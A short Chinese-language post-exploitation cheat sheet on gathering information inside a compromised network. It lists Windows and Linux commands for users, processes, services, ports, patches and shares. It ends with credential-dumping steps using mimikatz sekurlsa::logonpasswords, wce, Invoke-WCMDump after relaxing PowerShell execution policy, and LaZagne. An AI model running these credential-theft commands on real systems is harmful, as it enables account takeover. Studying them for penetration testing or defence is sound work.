欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

内网信息搜集

程序员文章站 2022-05-15 20:24:05
...

一、用户列表

windows:net user

    内网信息搜集

linux:vim /etc/passwd

    内网信息搜集

二、进程信息

windows:tasklist

    内网信息搜集

杀死某个进程:taskkill  /pid  pid号  /f

    内网信息搜集

linux:ps aux

    内网信息搜集

 top

    内网信息搜集

三、服务类别

windows:net start

    内网信息搜集

linux:chkconfig --list

    内网信息搜集

 service --status-all

    内网信息搜集

四、端口列表

windows:netstat -ano

    内网信息搜集

linux:查看所有得tcp端口:netstat -anpt

    内网信息搜集

查看所有得tcp和udp端口:netstat -anptu

    内网信息搜集

查看所有得开放端口:netstat -anptul

    内网信息搜集

五、补丁列表

wndows:systeminfo

    内网信息搜集内网信息搜集

  查看补丁的详细信息:wmic qfe list full

    内网信息搜集

linux:查看系统内核:uname -a

    内网信息搜集

查看具体程序的补丁情况:rpm -qa | grep ssh

    内网信息搜集

六、本机共享 

windows:net share

  内网信息搜集

七、本地用户习惯

windows:可查看用户的家目录,比如以下文件

   内网信息搜集

八、当前用户密码(这里的密码不止登陆密码,还有用户登录 一些网址的密码)

window:

1.mimikatz(在win2008服务器上)

输入:

mimikatz.exe privilege::debug 
sekurlsa::logonpasswords

  内网信息搜集内网信息搜集

2.wce

wce.exe -l    列出密码和凭证

  内网信息搜集

 wce -lv  读取sam文件的密码

内网信息搜集

 3.lvoke-WCMDump

上传该脚本到win8服务器,利用win8自带得powershell,获取凭证用户名和密码

(1)修改策略为可加载 脚本

Set-ExecutionPolicy unrestricted

  内网信息搜集

(2)加载Invoke-WCMDump脚本

Import-Module .\Invoke-WCMDump.ps1

  内网信息搜集

(3)输入脚本名Ivoke-WCMDump运行

  内网信息搜集

4.LaZagne

LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。 因为每个软件储存密码的方式不尽相同(明文、API、定制算法、数据库等),所以该工具使用多种方法获取软件密码

lazagne.exe all 查看所有

内网信息搜集

 5.QuarksPwdump

 

 

 

相关标签: 后渗透